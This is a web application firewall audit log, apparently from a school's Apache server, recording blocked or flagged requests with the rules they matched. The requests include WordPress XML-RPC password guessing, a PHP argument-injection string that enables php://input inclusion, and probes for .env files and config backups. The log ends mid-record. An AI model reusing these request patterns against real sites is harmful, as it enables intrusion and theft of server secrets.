Content-Type: text/html; charset=iso-8859-1
--f2ceae2c-E--
--f2ceae2c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (143+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744780077053958 3661 (- - -)
Stopwatch2: 1744780077053958 3661; combined=2790, p1=344, p2=2301, p3=0, p4=0, p5=85, sr=72, sw=60, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f2ceae2c-Z--
--a2a2a856-A--
[16/Apr/2025:12:08:57 +0700] Z_87aRk9XPLR9cFiTEvJgwAAABY 103.236.140.4 49732 103.236.140.4 8181
--a2a2a856-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a2a2a856-C--
wp.getUsersBlogs
miswan
superman1
--a2a2a856-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a2a2a856-E--
--a2a2a856-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744780137240224 4440 (- - -)
Stopwatch2: 1744780137240224 4440; combined=3304, p1=349, p2=2760, p3=0, p4=0, p5=111, sr=82, sw=84, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a2a2a856-Z--
--f947cc62-A--
[16/Apr/2025:14:34:15 +0700] Z_9dd5VnVduWmh0dMDMb1gAAAIY 103.236.140.4 51418 103.236.140.4 8181
--f947cc62-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 102.211.152.45
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 102.211.152.45
X-Forwarded-Proto: https
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--f947cc62-C--
--f947cc62-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f947cc62-E--
--f947cc62-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744788855276394 4911 (- - -)
Stopwatch2: 1744788855276394 4911; combined=3091, p1=518, p2=2539, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f947cc62-Z--
--7061af0c-A--
[16/Apr/2025:15:42:27 +0700] Z_9tc0-sESiKFppgz04h0wAAANQ 103.236.140.4 52022 103.236.140.4 8181
--7061af0c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 159.65.63.18
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 159.65.63.18
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--7061af0c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7061af0c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744792947282450 750 (- - -)
Stopwatch2: 1744792947282450 750; combined=331, p1=290, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7061af0c-Z--
--ca8b976a-A--
[16/Apr/2025:16:49:22 +0700] Z_99Ihk9XPLR9cFiTEvK4QAAABg 103.236.140.4 52404 103.236.140.4 8181
--ca8b976a-B--
POST /dns-query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--ca8b976a-C--
è examplecom
--ca8b976a-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ca8b976a-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1744796962765021 2816 (- - -)
Stopwatch2: 1744796962765021 2816; combined=1955, p1=449, p2=1436, p3=21, p4=23, p5=25, sr=65, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ca8b976a-Z--
--210c4625-A--
[16/Apr/2025:16:49:23 +0700] Z_99Ixk9XPLR9cFiTEvK4gAAAAM 103.236.140.4 52410 103.236.140.4 8181
--210c4625-B--
POST /dns-query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--210c4625-C--
£{ examplecom
--210c4625-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--210c4625-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1744796963056845 2714 (- - -)
Stopwatch2: 1744796963056845 2714; combined=1846, p1=396, p2=1380, p3=21, p4=23, p5=25, sr=66, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--210c4625-Z--
--fa40566d-A--
[16/Apr/2025:16:49:23 +0700] Z_99Ixk9XPLR9cFiTEvK4wAAABQ 103.236.140.4 52416 103.236.140.4 8181
--fa40566d-B--
POST /query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--fa40566d-C--
G
examplecom
--fa40566d-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fa40566d-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1744796963347574 2687 (- - -)
Stopwatch2: 1744796963347574 2687; combined=1835, p1=397, p2=1370, p3=20, p4=23, p5=25, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fa40566d-Z--
--225f2625-A--
[16/Apr/2025:16:49:23 +0700] Z_99Ixk9XPLR9cFiTEvK5QAAAAI 103.236.140.4 52422 103.236.140.4 8181
--225f2625-B--
POST /query HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--225f2625-C--
ӯ examplecom
--225f2625-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--225f2625-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1744796963638769 3297 (- - -)
Stopwatch2: 1744796963638769 3297; combined=2204, p1=477, p2=1643, p3=27, p4=29, p5=28, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--225f2625-Z--
--de8d6117-A--
[16/Apr/2025:16:49:23 +0700] Z_99I5VnVduWmh0dMDMcDwAAAIw 103.236.140.4 52428 103.236.140.4 8181
--de8d6117-B--
POST /resolve HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--de8d6117-C--
‰? examplecom
--de8d6117-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--de8d6117-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1744796963956080 3139 (- - -)
Stopwatch2: 1744796963956080 3139; combined=2114, p1=455, p2=1585, p3=20, p4=24, p5=30, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--de8d6117-Z--
--07f62c7d-A--
[16/Apr/2025:16:49:24 +0700] Z_99JJVnVduWmh0dMDMcEAAAAI0 103.236.140.4 52434 103.236.140.4 8181
--07f62c7d-B--
POST /resolve HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--07f62c7d-C--
ñÍ examplecom
--07f62c7d-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--07f62c7d-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1744796964254444 2773 (- - -)
Stopwatch2: 1744796964254444 2773; combined=1857, p1=407, p2=1373, p3=20, p4=23, p5=34, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--07f62c7d-Z--
--4fd74d5e-A--
[16/Apr/2025:16:49:24 +0700] Z_99JJVnVduWmh0dMDMcEgAAAJE 103.236.140.4 52440 103.236.140.4 8181
--4fd74d5e-B--
POST / HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--4fd74d5e-C--
£” examplecom
--4fd74d5e-F--
HTTP/1.1 200 OK
Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT
ETag: "13cd-6034254946480"
Accept-Ranges: bytes
Content-Length: 5069
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
--4fd74d5e-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1744796964945648 2917 (- - -)
Stopwatch2: 1744796964945648 2917; combined=1829, p1=400, p2=1350, p3=28, p4=24, p5=27, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4fd74d5e-Z--
--0ada093e-A--
[16/Apr/2025:16:49:25 +0700] Z_99JRk9XPLR9cFiTEvK6wAAAAs 103.236.140.4 52446 103.236.140.4 8181
--0ada093e-B--
POST / HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--0ada093e-C--
°W examplecom
--0ada093e-F--
HTTP/1.1 200 OK
Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT
ETag: "13cd-6034254946480"
Accept-Ranges: bytes
Content-Length: 5069
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
--0ada093e-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1744796965989753 2908 (- - -)
Stopwatch2: 1744796965989753 2908; combined=1856, p1=392, p2=1376, p3=28, p4=34, p5=26, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0ada093e-Z--
--528daa5a-A--
[16/Apr/2025:17:12:39 +0700] Z_-Clxk9XPLR9cFiTEvLHwAAABU 103.236.140.4 52668 103.236.140.4 8181
--528daa5a-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 147.182.149.75
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 147.182.149.75
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--528daa5a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--528daa5a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744798359852196 780 (- - -)
Stopwatch2: 1744798359852196 780; combined=318, p1=285, p2=0, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--528daa5a-Z--
--60e1e224-A--
[16/Apr/2025:17:20:01 +0700] Z_-EUSpe92T0H9-Aa0zD4wAAAEg 103.236.140.4 52784 103.236.140.4 8181
--60e1e224-B--
GET /.env HTTP/1.0
Host: vinic.twilightparadox.com
X-Real-IP: 167.71.175.236
X-Forwarded-Host: vinic.twilightparadox.com
X-Forwarded-Server: vinic.twilightparadox.com
X-Forwarded-For: 167.71.175.236
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--60e1e224-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--60e1e224-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744798801979234 835 (- - -)
Stopwatch2: 1744798801979234 835; combined=325, p1=292, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--60e1e224-Z--
--bff99756-A--
[16/Apr/2025:18:33:35 +0700] Z_-Vjxk9XPLR9cFiTEvLUQAAABI 103.236.140.4 53264 103.236.140.4 8181
--bff99756-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 159.89.127.165
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 159.89.127.165
X-Forwarded-Proto: http
Connection: close
User-Agent: Go-http-client/1.1
--bff99756-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bff99756-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744803215623578 670 (- - -)
Stopwatch2: 1744803215623578 670; combined=257, p1=220, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bff99756-Z--
--74069e37-A--
[16/Apr/2025:18:38:53 +0700] Z_-WzZVnVduWmh0dMDMcKAAAAIU 103.236.140.4 53308 103.236.140.4 8181
--74069e37-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 78.153.140.151
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 78.153.140.151
X-Forwarded-Proto: https
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1
--74069e37-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--74069e37-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1744803533453999 786 (- - -)
Stopwatch2: 1744803533453999 786; combined=327, p1=287, p2=0, p3=0, p4=0, p5=40, sr=90, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--74069e37-Z--
--9705b303-A--
[16/Apr/2025:18:38:54 +0700] Z_-WzpVnVduWmh0dMDMcKQAAAIc 103.236.140.4 53310 103.236.140.4 8181
--9705b303-B--
GET /conf/config.ini HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 78.153.140.151
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 78.153.140.151
X-Forwarded-Proto: https
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100
--9705b303-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9705b303-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744803534512979 2212 (- - -)
Stopwatch2: 1744803534512979 2212; combined=820, p1=376, p2=417, p3=0, p4=0, p5=26, sr=63, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9705b303-Z--
--9bbabf05-A--
[16/Apr/2025:18:39:04 +0700] Z_-W2Bk9XPLR9cFiTEvLWgAAAAg 103.236.140.4 53322 103.236.140.4 8181
--9bbabf05-B--
GET /configure.php.bak HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 78.153.140.151
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 78.153.140.151
X-Forwarded-Proto: https
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; HTC_0PCV220/1.11.506.1 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
--9bbabf05-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9bbabf05-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1744803544023196 1762 (- - -)
Stopwatch2: 1744803544023196 1762; combined=766, p1=354, p2=386, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9bbabf05-Z--
--a271fc58-A--
[16/Apr/2025:18:39:12 +0700] Z_-W4Bk9XPLR9cFiTEvLXAAAAAc 103.236.140.4 53326 103.236.140.4 8181
--a271fc58-B--
GET /config.ini.bak HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 78.153.140.151
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 78.153.140.151
X-Forwarded-Proto: https
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12
--a271fc58-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a271fc58-H--
